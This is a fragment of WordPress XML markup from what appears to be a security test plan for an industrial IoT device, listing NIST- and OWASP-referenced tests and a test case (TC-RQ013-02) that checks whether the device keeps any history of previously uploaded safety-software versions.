          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCE53BC" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC3DF9C" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBEA6C7" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763EDD2F" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E43DC71" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E482453" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47F81BE3" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43287700" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B74469" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4291DF52" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028A63DC" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C30C86" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E73EA94" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FCE4CE5" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C81EC33" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9E9866" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60172189" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ABC6C01" w14:textId="6849538C" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6988365B"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08753B8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782BDB" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0337278F"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75F558DC"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605EEDCD"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34D5C863"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6341" w:rsidRPr="007F5798" w14:paraId="5B17012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47A9C44" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EC9A2D6" w14:textId="1A06524A" w:rsidR="00906341" w:rsidRPr="007F5798"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722B8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirm only the current version is exposed (no historical/previous-version fields) via IoT-Core + I&amp;M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5878C62E" w14:textId="7F8F9567" w:rsidR="00906341" w:rsidRPr="007F5798"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906A1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42639D49" w14:textId="77777777" w:rsidR="00906341"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049B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Requirements-based verification; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C57B5C5" w14:textId="0295BF95" w:rsidR="00906341" w:rsidRPr="007F5798"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049B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BE4FEFD" w14:textId="45E3643C" w:rsidR="00906341" w:rsidRPr="007F5798"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SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00D258C9" w14:paraId="0F6CAA3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C934B4C" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59BC6332" w14:textId="64FC8BDC" w:rsidR="00906341" w:rsidRPr="00D258C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55E3F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Sequential-upload history test: two successive firmware uploads (v_A </w:t>
            </w:r>
            <w:r w:rsidR="003404D5" w:rsidRPr="003404D5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="00655E3F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> v_B); after each, query for any record of the previous version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B366509" w14:textId="0E5B9DDF" w:rsidR="00906341" w:rsidRPr="00D258C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906A1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC43FB0" w14:textId="77777777" w:rsidR="00906341"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3132A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §3.2 / §7; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60CEC503" w14:textId="62CC2E4F" w:rsidR="00906341" w:rsidRPr="00D258C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3132A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP ISTG-FW[UPDT]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7768ED83" w14:textId="4E1971C7" w:rsidR="00906341" w:rsidRPr="00D258C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SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00D0764E" w14:paraId="248FD9C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6CB8C26" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59CC6B2A" w14:textId="42D4B3D9" w:rsidR="00906341" w:rsidRPr="00D0764E"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0244F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Per-upload timestamp test: after an upload, check whether any absolute date/time is attached to the version change</w:t>
            </w:r>
            <w:r w:rsidR="00AD6EB8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AD6EB8" w:rsidRPr="00AD6EB8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(reuse TC-RQ003-04 method)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1238108A" w14:textId="38B1FCD3" w:rsidR="00906341" w:rsidRPr="00D0764E"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61CA0">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Proves G-2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BDF2F4A" w14:textId="749A1C5A" w:rsidR="00906341" w:rsidRPr="00D0764E"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43F89">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §3.2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C25E35B" w14:textId="79E46EBA" w:rsidR="00906341" w:rsidRPr="00D0764E"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SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00035F89" w14:paraId="55872DB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DA15D5D" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72877E9E" w14:textId="4B78C2E4" w:rsidR="00906341" w:rsidRPr="00035F8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34486">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>External-record verification: assess whether Release Notes provide per-serial, timestamped, tamper-evident, 5-year records for this unit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53115853" w14:textId="72D97F44" w:rsidR="00906341" w:rsidRPr="00035F8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F182A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CF436C3" w14:textId="77777777" w:rsidR="00906341"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D7EAA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §3.1; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B765BC4" w14:textId="5FE58F69" w:rsidR="00906341" w:rsidRPr="00035F8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D7EAA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP FSTM Stage 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66AB5275" w14:textId="04BB8E4F" w:rsidR="00906341" w:rsidRPr="00035F8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SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="299A32A7" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B95F23C" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="00DB074F" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="19"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="19"/>
      <w:r w:rsidR="00906341" w:rsidRPr="00DB074F">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="19"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF012EA" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF429BE" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731A8330" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E77F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ013-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="009E77F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sequential-Upload Version-History Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27B109" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">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906341" w14:paraId="32F996E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95FD" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE9DE14" w14:textId="77777777" w:rsidR="00906341"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06341" w14:paraId="4EACD97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20176E" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="662FB12C" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="5097"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC76EE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ013-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="16AA55E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820C848" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CB0689D" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00AB1D3A"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it-IT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB1D3A">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>RQ-013 → CR 2.8 / CR 2.9 / CR 3.9 → Asset I, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00D67CA6" w14:paraId="263751D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AE7D53" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="040A9D0B" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4549"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB1D3A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Repudiation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w14:paraId="53BE22F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34B6A57" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F3B5F26" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D"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71AFB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2 (Threat-Mitigation Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="1CA9278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4F9EB7" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4988B589" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D"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E1121">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that the device retains no historical, per-upload record of previously uploaded safety-software versions: after uploading version B over version A, no device-resident field reports that version A was ever installed.(The self-erasing install mechanics are cross-referenced to RQ-008; this test targets version-history existence.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="6E4E2BF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05F43CF" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01B93225"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841E2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Record the current version (v_A) and all version fields. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C57608"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841E2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Upload version B; after the install, read all version fields. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A4DDA6B"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841E2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Search for any device-resident record of v_A (previous-version field, upload-history list). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67C0E641" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="00EC056D"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841E2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Upload a further version C; repeat the search for v_A and v_B.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="00EE7A74" w14:paraId="16A2296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7F9B990" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
